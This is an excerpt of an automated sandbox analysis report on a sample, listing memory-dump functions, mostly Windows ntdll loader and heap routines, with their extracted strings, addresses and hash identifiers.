                                                                                                      • API String ID: 0-1468400865
                                                                                                      • Opcode ID: c54f6e17a1fb3beacf4a283a7a35f171365af6181bbe1ebd629df9661c7c283d
                                                                                                      • Instruction ID: ff80e41c19c789bfa8dae64999b6d208fe4cf64dc5aa752a307d4d3b98bac25c
                                                                                                      • Opcode Fuzzy Hash: c54f6e17a1fb3beacf4a283a7a35f171365af6181bbe1ebd629df9661c7c283d
                                                                                                      • Instruction Fuzzy Hash: D071F1719043459FCB25DF14C884F977FA8AF987A8F000468F9488B186D375D598CFD2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0112245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0116A992
                                                                                                      • LdrpDynamicShimModule, xrefs: 0116A998
                                                                                                      • apphelp.dll, xrefs: 01122462
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0116A9A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-176724104
                                                                                                      • Opcode ID: a798aef0b444a009b73d7bff5dea67ce574210a5859cc1c43a1749d994e88fde
                                                                                                      • Instruction ID: 203210ef61ae1e5b50505bcff116300aca3bc382ee5c071ee7851424f8e2affb
                                                                                                      • Opcode Fuzzy Hash: a798aef0b444a009b73d7bff5dea67ce574210a5859cc1c43a1749d994e88fde
                                                                                                      • Instruction Fuzzy Hash: C6313B75600301ABD73D9F5DE845EAE77B9FF84704F26002EE52177245D7B15992CB80
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011820DE Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • LdrpInitializationFailure, xrefs: 011820FA
                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 011820F3
                                                                                                      • `,, xrefs: 011820EB
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01182104
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$`,$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1034781813
                                                                                                      • Opcode ID: d4e2b9f856df6bb82324818b57445c662ca7dfbbb498cec1a7cb949dd57c928e
                                                                                                      • Instruction ID: 2739ce66f1667d459695e1074f3142b82ee3d9a4daf6a30fdc11e3b056037d76
                                                                                                      • Opcode Fuzzy Hash: d4e2b9f856df6bb82324818b57445c662ca7dfbbb498cec1a7cb949dd57c928e
                                                                                                      • Instruction Fuzzy Hash: E9F0C275641708AFE72CE64DCD46F9937BCEB40B58F60406DF6506B681D7B0A940CA91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • HEAP[%wZ]: , xrefs: 01113255
                                                                                                      • HEAP: , xrefs: 01113264
                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0111327D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                      • API String ID: 0-617086771
                                                                                                      • Opcode ID: 6960e3ae1fa7d802744ea23e5a9d71c8f0d7e3ebe15e1eee1397da4e5babef34
                                                                                                      • Instruction ID: 5e5ec3c3e76dca513b3feb66b7b5665a4b06a85a5962c7cb24e8ecda19425522
                                                                                                      • Opcode Fuzzy Hash: 6960e3ae1fa7d802744ea23e5a9d71c8f0d7e3ebe15e1eee1397da4e5babef34
                                                                                                      • Instruction Fuzzy Hash: 8E92CC71A042499FDB29CF68C440BAEFBF1FF48314F288469E859AB399D734A941CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01110770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-4253913091
                                                                                                      • Opcode ID: b2a42a4e925baaf3afe3565a492494e2a9f0152a5888afb97249a4f68c469c71
                                                                                                      • Instruction ID: 02aab9af601e5ef88c3d83ab22dc17ed7249476d1b89c988054ed1044d913805
                                                                                                      • Opcode Fuzzy Hash: b2a42a4e925baaf3afe3565a492494e2a9f0152a5888afb97249a4f68c469c71
                                                                                                      • Instruction Fuzzy Hash: 0FF1AA30A00606DFEB2DCF68C894B6AFBB6FF48344F148168E5569B385D731E991CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01126962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $@
                                                                                                      • API String ID: 0-1077428164
                                                                                                      • Opcode ID: 7a82c829d0979ff9f14dd90c04523a12cced82af553861fa740a6ca4021ab94d
                                                                                                      • Instruction ID: c19774033a636c201ad0497e93d6cdae631fe7249bc1032b21d1e88c020a72c1
                                                                                                      • Opcode Fuzzy Hash: 7a82c829d0979ff9f14dd90c04523a12cced82af553861fa740a6ca4021ab94d
                                                                                                      • Instruction Fuzzy Hash: B5C290716083519FDB2DCF28C840BABBBE5AF98714F05892DE9C9C7281E735D815CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 010FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                      • API String ID: 0-2779062949
                                                                                                      • Opcode ID: 9f7c34f27af5b20b78968093c22d2d9403229e01aa037bcba3d26e57ed8c2ed1
                                                                                                      • Instruction ID: a6815c8990f52e5e7abe8609a1e9c5c5b08a25bf098869b11f3fe662bc6e2b9e
                                                                                                      • Opcode Fuzzy Hash: 9f7c34f27af5b20b78968093c22d2d9403229e01aa037bcba3d26e57ed8c2ed1
                                                                                                      • Instruction Fuzzy Hash: 15A15A75901629DBDB75DF28CC88BEABBB8EF44714F1001E9EA18A7250D7359E84CF90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01120BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0116A10F
                                                                                                      • LdrpCheckModule, xrefs: 0116A117
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0116A121
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-161242083
                                                                                                      • Opcode ID: 2b21330b3f3b3db5c04cdb5238529bb84625dd272201dc6d901b85a5612f0695
                                                                                                      • Instruction ID: d0af74ea31169fc0389b3c491f52b6e089adac99a5798a1f44d45790dd3e8a4a
                                                                                                      • Opcode Fuzzy Hash: 2b21330b3f3b3db5c04cdb5238529bb84625dd272201dc6d901b85a5612f0695
                                                                                                      • Instruction Fuzzy Hash: D271F1B0A00205DFDB2DEF68C980AAEB7F4FF48304F15416DE912A7255E731ADA2CB51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01110A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-1334570610
                                                                                                      • Opcode ID: b5cf4223f25fc89f252b42ed3c5226945bf6228dad8c25d9437f404df1694971
                                                                                                      • Instruction ID: 7ec4390c2485292224b8c04fd0876dc88ad013c0ee89c29be23d27b64ed6f927
                                                                                                      • Opcode Fuzzy Hash: b5cf4223f25fc89f252b42ed3c5226945bf6228dad8c25d9437f404df1694971
                                                                                                      • Instruction Fuzzy Hash: 0F61A931A043019FDB2DCF28C440B6ABBA6FF48704F14856DE4998B286D771E891CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0113C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 011782DE
                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 011782D7
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011782E8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1783798831
                                                                                                      • Opcode ID: 1ab8264c74e21f184c1f5946da8ade1b03c0e200086e8f04ec28549899b1499d
                                                                                                      • Instruction ID: 74cc8d37c76934fed1adeae42332d38eae7ad3b78a7dd01fd2348ee25768f837
                                                                                                      • Opcode Fuzzy Hash: 1ab8264c74e21f184c1f5946da8ade1b03c0e200086e8f04ec28549899b1499d
                                                                                                      • Instruction Fuzzy Hash: D8412072504701ABC72DEB28D845B5BBBF8AF84664F00493EF958E3294EB30D840CBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • @, xrefs: 011BC1F1
                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011BC1C5
                                                                                                      • PreferredUILanguages, xrefs: 011BC212
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                      • API String ID: 0-2968386058
                                                                                                      • Opcode ID: 17b65584584d7c3e9c84ea27463022d03e38540fc1d1003ab99d1ca14e10a207
                                                                                                      • Instruction ID: f245a4544c09880a81b262fcef637492fff51f975b7064d0dcd0e8e56dcf73a6
                                                                                                      • Opcode Fuzzy Hash: 17b65584584d7c3e9c84ea27463022d03e38540fc1d1003ab99d1ca14e10a207
                                                                                                      • Instruction Fuzzy Hash: F5418671E00219EBEF19DFD8C881FEEBBB9AB14704F1440AAE609F7240D7749A45CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01194144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                      • API String ID: 0-1373925480
                                                                                                      • Opcode ID: f2f83971e868a4065bd90bc6c6945652cf2ead45a00ec8ea0a8822604c34e93f
                                                                                                      • Instruction ID: e4452f99105487729630bb480e5a18fee5af50e36c682408274b8b723d153d12
                                                                                                      • Opcode Fuzzy Hash: f2f83971e868a4065bd90bc6c6945652cf2ead45a00ec8ea0a8822604c34e93f
                                                                                                      • Instruction Fuzzy Hash: B5413671A002588BEF2EDBD8DA40BACBBB5FF55354F1400AAD921EBB81D7349902CB11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01184755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01184899
                                                                                                      • LdrpCheckRedirection, xrefs: 0118488F
                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01184888
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                      • API String ID: 0-3154609507
                                                                                                      • Opcode ID: 9d5943cb8a46caec800479073441ef2afb3f0baaacb39c0a2e7326584529bcb3
                                                                                                      • Instruction ID: 74012c8be688fefa2d488a450d4e54f52d06889da090507e874c0b468b35d214
                                                                                                      • Opcode Fuzzy Hash: 9d5943cb8a46caec800479073441ef2afb3f0baaacb39c0a2e7326584529bcb3
                                                                                                      • Instruction Fuzzy Hash: 7841C6326147529BCB29FF9CD440B267BE4BF4A650F06856DED9497B15EB30D800CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00401D30 Relevance: 3.9, Strings: 3, Instructions: 116COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: *J$7$6
                                                                                                      • API String ID: 0-2173226183
                                                                                                      • Opcode ID: fbe8aad46a7cfa44e7d4decce44057fda3db33b1e0ee66f9ceb352958b7ca561
                                                                                                      • Instruction ID: bf902f846d3b1c76a3ad222e692bd2a73a1e2d29ade4d768d86de4544152b038
                                                                                                      • Opcode Fuzzy Hash: fbe8aad46a7cfa44e7d4decce44057fda3db33b1e0ee66f9ceb352958b7ca561
                                                                                                      • Instruction Fuzzy Hash: 6B411FB9A052898FEB11CFA5D8483DEBFB1FF46308F24416AC4446F2D1D3B9590ACB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01110BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-2558761708
                                                                                                      • Opcode ID: 6c44718911bceb7695ed6152b7405dd5fb3c4c6aba5668d8a079fa91b6a2e9ab
                                                                                                      • Instruction ID: c5bbed57cb789d52d6abf77c0dfe4638689a27f595d17227756484e741a9319a
                                                                                                      • Opcode Fuzzy Hash: 6c44718911bceb7695ed6152b7405dd5fb3c4c6aba5668d8a079fa91b6a2e9ab
                                                                                                      • Instruction Fuzzy Hash: DB113330315102CFDB6DCA18C881B7AF3AAFF45619F1980ADF446CB255EB35D880C756
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: #%u
                                                                                                      • API String ID: 48624451-232158463
                                                                                                      • Opcode ID: aed879fd29ab437cf356379b5998f724a70d335454a7759080dcb96ca79c367e
                                                                                                      • Instruction ID: 5d244d36874fcdb598fa842a89ac1ff24bffc655e70c8a29c297ce6a0e527f4f
                                                                                                      • Opcode Fuzzy Hash: aed879fd29ab437cf356379b5998f724a70d335454a7759080dcb96ca79c367e
                                                                                                      • Instruction Fuzzy Hash: 3B715971A0014A9FDB09DFA8C980BAEBBF8FF18744F154065E901E7655EB34ED41CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0110A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • LdrResSearchResource Exit, xrefs: 0110AA25
                                                                                                      • LdrResSearchResource Enter, xrefs: 0110AA13
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                      • API String ID: 0-4066393604
                                                                                                      • Opcode ID: fb61ac6f24d62b900d914b4cc9e4dbe440575517978c5701588499d64ec438a3
                                                                                                      • Instruction ID: bbb10179765715cf27783567e57f7796f8bf7e15b2be462cfc3f49a5bd9e2f91
                                                                                                      • Opcode Fuzzy Hash: fb61ac6f24d62b900d914b4cc9e4dbe440575517978c5701588499d64ec438a3
                                                                                                      • Instruction Fuzzy Hash: F9E19D71E00719EBEF2ECE98D980BAEBBB9BF44314F11442AE911E72C1D7B59940CB51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `$`
                                                                                                      • API String ID: 0-197956300
                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                      • Instruction ID: 7e9548397967897a5607d0cc589485d6415361d03a08d50725758eaf4bfab4e9
                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                      • Instruction Fuzzy Hash: 81C1E73120434A9BE72ACF28D841B6BBBE5BFE4B18F084A2CF695C7290E775D505CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0117E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: Legacy$UEFI
                                                                                                      • API String ID: 2994545307-634100481
                                                                                                      • Opcode ID: 0f312ff9e9416bb7eff0b209ab056a10ff1efe5fbbb2992d67a26f456cba3e8e
                                                                                                      • Instruction ID: 777f4066d3406b579ed7854b11b2c449777d7833b26e018c53ca3f01fd83a2eb
                                                                                                      • Opcode Fuzzy Hash: 0f312ff9e9416bb7eff0b209ab056a10ff1efe5fbbb2992d67a26f456cba3e8e
                                                                                                      • Instruction Fuzzy Hash: 51614B71E016199FDB29DFA9C840BAEBBF9FB48704F1440ADE649EB391D731A940CB50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$MUI
                                                                                                      • API String ID: 0-17815947
                                                                                                      • Opcode ID: 57e1938c27bde4d75730be99b672d073a6f9847702bef8aef184eafa21d4d085
                                                                                                      • Instruction ID: 04d31c477224af701fc8cd08e53178afc0106e2e20eb7dd0fff0371f845dfd2c
                                                                                                      • Opcode Fuzzy Hash: 57e1938c27bde4d75730be99b672d073a6f9847702bef8aef184eafa21d4d085
                                                                                                      • Instruction Fuzzy Hash: A8515875E0021DAFDB15DFA9DC80AEEBFB8EB04758F14052AEA10B7680D7709A45CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • kLsE, xrefs: 01100540
                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0110063D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                      • API String ID: 0-2547482624
                                                                                                      • Opcode ID: 0658d5aad5df068acf6e4e9e8c0fda63418f97c156f1a5fc40531ea478b4ebee
                                                                                                      • Instruction ID: 92bd8ea9fda9b67737d64f01ad8babae623409cef9a247588b67b75804334438
                                                                                                      • Opcode Fuzzy Hash: 0658d5aad5df068acf6e4e9e8c0fda63418f97c156f1a5fc40531ea478b4ebee
                                                                                                      • Instruction Fuzzy Hash: BA51B1719047428FD72AEF68C8407A7B7E5AF88344F10483EFAE987281E7B5D545CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0110A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0110A309
                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0110A2FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                      • API String ID: 0-2876891731
                                                                                                      • Opcode ID: 5ccc9953a8129bc7c5f19903c9eb654e7463607fdaa26067647f292840429f24
                                                                                                      • Instruction ID: 7e5972a6d5783d9e9f2316382dd6677c88898fd573fbc265d8dbaa048975a146
                                                                                                      • Opcode Fuzzy Hash: 5ccc9953a8129bc7c5f19903c9eb654e7463607fdaa26067647f292840429f24
                                                                                                      • Instruction Fuzzy Hash: 6241AC31E08745CBDB1A8F59D840BA9BBB4FF94314F148065E910DB291E7B5D900CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0113A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                      • Opcode ID: 00c744059969314ae524181fa60c0a08f83d966688a6f4baa12fac5f2e068f3b
                                                                                                      • Instruction ID: 5a2b8ccc956ab1646bbba2be6a11931a8868290bdbd84a3c61fe5059e43a0661
                                                                                                      • Opcode Fuzzy Hash: 00c744059969314ae524181fa60c0a08f83d966688a6f4baa12fac5f2e068f3b
                                                                                                      • Instruction Fuzzy Hash: 1301D1B2240700AFD315DF14DD45F1677E9EB84B29F018939A698CB194E334D844DB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0110C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: MUI
                                                                                                      • API String ID: 0-1339004836
